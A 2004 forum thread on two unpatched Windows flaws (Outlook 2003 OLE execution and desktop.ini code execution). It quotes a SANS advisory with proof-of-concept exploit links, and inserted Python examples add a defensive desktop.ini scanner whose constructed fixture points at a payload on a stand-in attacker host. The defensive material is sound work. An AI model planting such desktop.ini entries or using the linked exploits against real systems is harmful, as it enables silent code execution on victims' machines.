New Windows vulnerabilities


Westside guy
May 24, 2004, 10:52 AM
Hi there,

Not sure how to post this without starting a flame war. :D But (mainly for the "Windows is only vulnerable due to non-patched machines" crowd) I thought it was worth mentioning two recently announced vulnerabilities hot off the SANS newswire. They're the first not-already-patched exploits I've seen in several weeks, but it's not an uncommon problem.

Out of fairness I'll also point out the same issue listed the OS X "Help Protocol" exploit, which was patched last Friday.

#1 HIGH: Microsoft Outlook Arbitrary Code Execution
Affected: Outlook 2003

Description: The default security setting of Outlook 2003 ("Restricted Zone") does not allow execution of ActiveX controls and arbitrary scripts. However, it is reported that an email containing an embedded OLE object, such as a Windows Media Player object, can bypass these security checks. By exploiting this flaw in conjunction with Outlook's flaw of storing files specified in "img" tags at a predictable location, it may be possible to silently execute arbitrary code on the client system. The code would execute with the privileges of the logged-on user. A proof-of-concept exploit has been posted.

Status: Microsoft has not confirmed, no updates available.

References:
Postings by http-equiv
http://archives.neohapsis.com/archives/ntbugtraq/2004-q2/0058.html
http://archives.neohapsis.com/archives/ntbugtraq/2004-q2/0056.html
Proof-of-Concept Exploit
http://www.malware.com/rockIT.zip
OLE Concepts
http://support.microsoft.com/support/kb/articles/Q86/0/08.asp&NoWebContent=1
SecurityFocus BIDs
http://www.securityfocus.com/bid/10369
http://www.securityfocus.com/bid/10307

#2 MODERATE: Windows Folder Arbitrary Code Execution
Affected: Windows XP/2000

Description: The hidden file "desktop.ini", when present in a Windows folder, instructs Windows Explorer how to display the folder's contents. A problem arises when the ".ShellClassInfo" section in a folder's desktop.ini file points to an executable program. This can be exploited to execute arbitrary code on a client system when an unsuspecting user opens such a specially crafted folder. To exploit the flaw, an attacker would have to create the malicious "shared" folder and entice a victim to open it. The attacker can include the folder's URI, e.g. \\attacker-ip\bad-folder, in a webpage, or email it to a potential victim. A proof-of-concept exploit that installs a keylogger on the client system has been publicly posted.

Status: Microsoft has not confirmed, no patches available. Block ports 139/tcp and 445/tcp at the network perimeter to prevent attacks from the Internet.

References:
Posting by Roozbeh Afrasiabi
http://www.securityfocus.com/archive/1/363590/2004-05-17/2004-05-23/0
Proof-of-Concept Exploit
http://www.freewebs.com/roozbeh_afrasiabi/xploit/execute.htm
Desktop.ini File Details
http://msdn.microsoft.com/library/en-us/shellcc/platform/shell/programmersguide/shell_basics/shell_basics_extending/custom.asp
SecurityFocus BID
http://www.securityfocus.com/bid/10363
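The advisory above says only that the ".ShellClassInfo" section "points to an executable program" and does not name the key involved. What follows is an added example, not code from SANS or from anyone in this thread: a scanner that walks a mounted share or an extracted archive, reads every desktop.ini it finds (including the UTF-16 encoding these files frequently use), and rates each .ShellClassInfo value that references executable code. The set of extensions treated as executable, the keys that may legitimately reference system DLLs (IconFile, IconResource, LocalizedResourceName, InfoTip), and the high/medium ratings are this example's own assumptions. The two sample desktop.ini contents are constructed; the hostile one reuses the \\attacker-ip\bad-folder path the advisory gives as its illustration.

```python
"""Scan a directory tree (mounted share or extracted archive) for desktop.ini
files whose [.ShellClassInfo] section points at executable code.

Added example for the desktop.ini advisory; not SANS or poster code.  The
advisory does not name the key, so the extension list, the resource-key set
and the severity rules below are this example's assumptions."""
import codecs
import os
import re
from typing import Dict, List, Tuple

# Assumption: extensions the shell will run as code when an entry points at them.
EXEC_EXTS = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".dll", ".cpl",
             ".hta", ".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh"}
# Assumption: these keys normally carry icon/string resources from system DLLs.
RESOURCE_KEYS = {"iconfile", "iconresource", "localizedresourcename", "infotip"}
SYSTEM_PREFIXES = ("%systemroot%", "%windir%", "c:\\windows\\", "c:\\winnt\\")

Finding = Tuple[str, str, str]  # (severity, key, referenced path)


def decode_ini(data: bytes) -> str:
    """desktop.ini is frequently UTF-16 with a BOM; fall back to UTF-8/ANSI."""
    if data.startswith((codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE)):
        return data.decode("utf-16")
    try:
        return data.decode("utf-8-sig")
    except UnicodeDecodeError:
        return data.decode("cp1252", errors="replace")


def parse_ini(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal INI reader (configparser rejects the duplicate keys that real
    desktop.ini files contain).  Section and key names are lower-cased."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def referenced_path(value: str) -> str:
    """Strip the decorations Windows allows: a leading '@' on string
    resources, a trailing ',<index>' resource selector, and quotes."""
    path = value.strip().lstrip("@")
    m = re.match(r"^(.*),\s*-?\d+\s*$", path)
    if m:
        path = m.group(1)
    return path.strip().strip('"')


def assess(sections: Dict[str, Dict[str, str]]) -> List[Finding]:
    """Rate every [.ShellClassInfo] entry that references something executable."""
    findings: List[Finding] = []
    for key, value in sections.get(".shellclassinfo", {}).items():
        path = referenced_path(value)
        ext = os.path.splitext(path)[1].lower()
        if ext not in EXEC_EXTS:
            continue
        low = path.lower()
        if low.startswith("\\\\"):
            findings.append(("high", key, path))        # code pulled from another host
        elif re.match(r"^([a-z]:\\|%)", low):
            if not (low.startswith(SYSTEM_PREFIXES) and key in RESOURCE_KEYS):
                findings.append(("medium", key, path))  # absolute path outside Windows dir
        elif key in RESOURCE_KEYS and ext == ".dll" and "\\" not in low:
            continue                                    # e.g. @shell32.dll,-21770 (system lookup)
        else:
            findings.append(("high", key, path))        # relative: binary ships with the folder
    return findings


def scan_tree(root: str) -> List[Tuple[str, Finding]]:
    """Walk root and collect (desktop.ini path, finding) pairs."""
    hits: List[Tuple[str, Finding]] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() == "desktop.ini":
                full = os.path.join(dirpath, name)
                with open(full, "rb") as fh:
                    text = decode_ini(fh.read())
                hits.extend((full, f) for f in assess(parse_ini(text)))
    return hits


# Constructed samples: a stock folder and a hostile one (the UNC path is the
# advisory's own illustration, the file names are made up).
BENIGN = ("[.ShellClassInfo]\r\n"
          "IconResource=%SystemRoot%\\system32\\imageres.dll,-3\r\n"
          "LocalizedResourceName=@%SystemRoot%\\system32\\shell32.dll,-21770\r\n")
MALICIOUS = ("[.ShellClassInfo]\r\n"
             "IconFile=\\\\attacker-ip\\bad-folder\\payload.exe\r\n"
             "InfoTip=helper.hta\r\n"
             "[ViewState]\r\nMode=\r\n")

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, assess(parse_ini(sample)))
```

UNC and relative targets are the two shapes the advisory describes (code fetched from the attacker's host, or a binary that travels inside the shared folder), which is why they rate higher than an absolute path into some local directory. Point scan_tree at a share mounted read-only or at an archive after extraction; the folder never has to be opened in Explorer for the check to run.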

robbieduncan
May 24, 2004, 11:00 AM
Whilst it is unsurprising that there are undiscovered flaws in MS programs, the first is not a Windows flaw. It's an Outlook 2003 flaw. There are many Windows machines without Outlook 2003.

johnnyjibbs
May 24, 2004, 11:11 AM
How many security flaws aren't to do with Outlook, Outlook Express or IE? :D :D

wrldwzrd89
May 24, 2004, 11:12 AM
> Whilst it is unsurprising that there are undiscovered flaws in MS programs, the first is not a Windows flaw. It's an Outlook 2003 flaw. There are many Windows machines without Outlook 2003.
Although the first flaw is technically an Outlook 2003 flaw rather than one in Windows itself, it still qualifies as a Windows flaw since Outlook 2003 is not available for platforms other than Windows. Both flaws are also Microsoft flaws, regardless of which program(s) they affect. I'm glad I don't use Windows (at home)!

tomf87
May 24, 2004, 11:18 AM
> Although the first flaw is technically an Outlook 2003 flaw rather than one in Windows itself, it still qualifies as a Windows flaw since Outlook 2003 is not available for platforms other than Windows. Both flaws are also Microsoft flaws, regardless of which program(s) they affect. I'm glad I don't use Windows (at home)!

This doesn't make any sense whatsoever. So, if Apple's Final Cut Pro application has a flaw, then it is an OS X flaw as well? That doesn't make sense. While they do have the same manufacturer, one is an application and the other is an operating system.

wrldwzrd89
May 24, 2004, 11:19 AM
> This doesn't make any sense whatsoever. So, if Apple's Final Cut Pro application has a flaw, then it is an OS X flaw as well? That doesn't make sense. While they do have the same manufacturer, one is an application and the other is an operating system.
I was just trying to explain what I thought the original poster's logic was...I guess I failed (either that, or I succeeded, but the logic was wrong anyway).

tomf87
May 24, 2004, 11:21 AM
> I was just trying to explain what I thought the original poster's logic was...I guess I failed (either that, or I succeeded, but the logic was wrong anyway).

Either way, it doesn't matter. My mind is computing data well today anyway, so I could be wrong as well. :)

edesignuk
May 24, 2004, 11:23 AM
> How many security flaws aren't to do with Outlook, Outlook Express or IE? :D :D
Don't forget IIS! That's a biggie! :eek:

wrldwzrd89
May 24, 2004, 11:27 AM
> Don't forget IIS! That's a biggie! :eek:
IMO, Microsoft's IIS has as many security holes as 2,000 slices of Swiss cheese (which is FAR too many).

mkrishnan
May 24, 2004, 11:54 AM
> Description: The hidden file "desktop.ini", when present in a Windows folder, instructs Windows Explorer how to display the folder's contents. A problem arises when the ".ShellClassInfo" section in a folder's desktop.ini file points to an executable program.

Hmmm...if I understand this correctly, this could potentially be pasted into any zip'd file (install file, etc) containing folders, and would then act when the folders were opened by a user with active desktop enabled, right? If that's so, I'm surprised it's floated around for so long. :( Of course, maybe that's cuz everyone's turning off active desktop and going classic as soon as they get their Win PCs.... :D

Westside guy
May 24, 2004, 01:14 PM
> I was just trying to explain what I thought the original poster's logic was...I guess I failed (either that, or I succeeded, but the logic was wrong anyway).

This poster's original logic was thus: While this is indeed a flaw in Outlook, because of the way Windows is constructed many "Outlook flaws" end up actually residing in Internet Explorer's code base (don't know about this one). As such, they are often part of the actual operating system code rather than stand-alone. That's why some recent "Outlook flaws" were exploitable whether or not Outlook was actually running.

Also, there are lots of cross-dependencies on Windows. I know on our home XP box we cannot (at least according to XP) uninstall Outlook without breaking some other programs' functionality - even though we don't use Outlook.

Mav451
May 24, 2004, 01:29 PM
> Hmmm...if I understand this correctly, this could potentially be pasted into any zip'd file (install file, etc) containing folders, and would then act when the folders were opened by a user with active desktop enabled, right? If that's so, I'm surprised it's floated around for so long. :( Of course, maybe that's cuz everyone's turning off active desktop and going classic as soon as they get their Win PCs.... :D

Haha, I haven't heard the term "active desktop" since 1999...talk about a trip through time.

wrldwzrd89
May 24, 2004, 02:04 PM
> Hmmm...if I understand this correctly, this could potentially be pasted into any zip'd file (install file, etc) containing folders, and would then act when the folders were opened by a user with active desktop enabled, right? If that's so, I'm surprised it's floated around for so long. :( Of course, maybe that's cuz everyone's turning off active desktop and going classic as soon as they get their Win PCs.... :D
My understanding is that this particular flaw can be exploited regardless of Active Desktop settings. The only thing I think it might depend on is that "Use Web-style folders" for Explorer is enabled (I don't know if the desktop.ini and folder.htt files are used when Web folders are disabled).

mkrishnan
May 25, 2004, 09:45 AM
> My understanding is that this particular flaw can be exploited regardless of Active Desktop settings. The only thing I think it might depend on is that "Use Web-style folders" for Explorer is enabled (I don't know if the desktop.ini and folder.htt files are used when Web folders are disabled).

Oh, sorry. LOL this is what I was thinking of when I said active desktop. :o I guess they don't call it that anymore. I haven't used XP all that much. But yeah, I really hate web-style folders and I always turn them off.

But still, my point, hasn't this flaw basically existed as long as web-style folders, i.e. a REALLY long time?

wrldwzrd89
May 25, 2004, 10:12 AM
> Oh, sorry. LOL this is what I was thinking of when I said active desktop. :o I guess they don't call it that anymore. I haven't used XP all that much. But yeah, I really hate web-style folders and I always turn them off.
>
> But still, my point, hasn't this flaw basically existed as long as web-style folders, i.e. a REALLY long time?
You're probably right - odds are good that ever since Windows started using Web-style folders (can't remember if this was in Win95 first or Win98), this particular flaw has been present.

SiliconAddict
May 25, 2004, 02:40 PM
> You're probably right - odds are good that ever since Windows started using Web-style folders (can't remember if this was in Win95 first or Win98), this particular flaw has been present.


Win98 started it and it is the most annoying thing on the planet. I can't tell you how many damn times I've had the wonderful error message of "Can not delete file. File is in use" or something along those lines simply because MS is previewing the damn thing in the web portion of the file browser. I ALWAYS turn this feature off for several reasons the biggest being that it slows down the browsing process. When I'm powering through a folder structure to move files I don't need a damn cute web interface to get in the way. Actually the coolest most innovative design MS did was the address bar in the file browser. I can power through a path with the auto filling options. Screw point and click. The way MS did it was a hybrid of the two methods.

Beyond that #1 doesn't affect me since my mail server bounces back any HTML mail to the sender with a nice message. "Please send any e-mails to Jonathan in non-HTML format. Thanks." I neither care for nor need HTML mail. Give me RTF text. That's good enough for me and it guarantees that a script isn't going to be embedded into my email that will decimate my computer.
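As an added example of the bounce rule described in the post above (this is not the poster's actual mail-server configuration): the check has to walk every MIME part, because most HTML mail arrives as multipart/alternative with a text/plain twin, so the top-level Content-Type never says text/html. The two sample messages are constructed; the bounce text is the one the poster quotes, and treating an attached .htm/.html file the same way as an HTML body is this example's own assumption.

```python
"""Reject any message that carries an HTML part and build the bounce reply.

Added example for the thread, not the poster's server setup.  Sample
messages below are constructed."""
import email
from email import policy
from email.message import EmailMessage
from typing import List

BOUNCE_TEXT = "Please send any e-mails to Jonathan in non-HTML format. Thanks."


def html_parts(raw: str) -> List[str]:
    """Return a label for every MIME part a client would render as HTML.

    walk() descends into multipart/alternative and multipart/mixed, so the
    text/html twin of a plain-text body is found even though the message's
    own Content-Type is multipart/alternative."""
    msg = email.message_from_string(raw, policy=policy.default)
    found: List[str] = []
    for part in msg.walk():
        ctype = part.get_content_type()
        name = (part.get_filename() or "").lower()
        if ctype == "text/html":
            found.append(ctype)
        elif name.endswith((".htm", ".html", ".mht")):
            # Assumption: HTML shipped as an attachment is rejected as well.
            found.append(f"{ctype} ({name})")
    return found


def decide(raw: str) -> str:
    """'bounce' if any part is HTML, otherwise 'accept'."""
    return "bounce" if html_parts(raw) else "accept"


def bounce_message(raw: str) -> EmailMessage:
    """Build the plain-text reply that goes back to the sender of a rejected message."""
    original = email.message_from_string(raw, policy=policy.default)
    reply = EmailMessage()
    reply["To"] = str(original["From"])
    reply["Subject"] = "Re: " + str(original["Subject"] or "")
    reply.set_content(BOUNCE_TEXT)
    return reply


# Constructed sample messages: a bare text/plain mail and the usual
# multipart/alternative shape that hides a text/html part below the top level.
PLAIN = ("From: alice@example.test\r\nTo: jonathan@example.test\r\n"
         "Subject: notes\r\nContent-Type: text/plain\r\n\r\nhello\r\n")
ALTERNATIVE = ("From: alice@example.test\r\nTo: jonathan@example.test\r\n"
               "Subject: notes\r\nMIME-Version: 1.0\r\n"
               'Content-Type: multipart/alternative; boundary="b1"\r\n\r\n'
               "--b1\r\nContent-Type: text/plain\r\n\r\nhello\r\n"
               "--b1\r\nContent-Type: text/html\r\n\r\n<p>hello</p>\r\n--b1--\r\n")

if __name__ == "__main__":
    for raw in (PLAIN, ALTERNATIVE):
        print(decide(raw), html_parts(raw))
```

A filter that only inspected the top-level Content-Type would accept the second sample, since that header reads multipart/alternative; the HTML body is one level down.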

mkrishnan
May 26, 2004, 06:54 AM
> Actually the coolest most innovative design MS did was the address bar in the file browser. I can power through a path with the auto filling options. Screw point and click. The way MS did it was a hybrid of the two methods.

Yeah, I love this feature too -- especially with autocomplete. I use it like crazy. When the whole active desktop / MSIE integration issue was floating around, I was worried that they would remove this in order to comply with the ruling! :( So I was glad they didn't....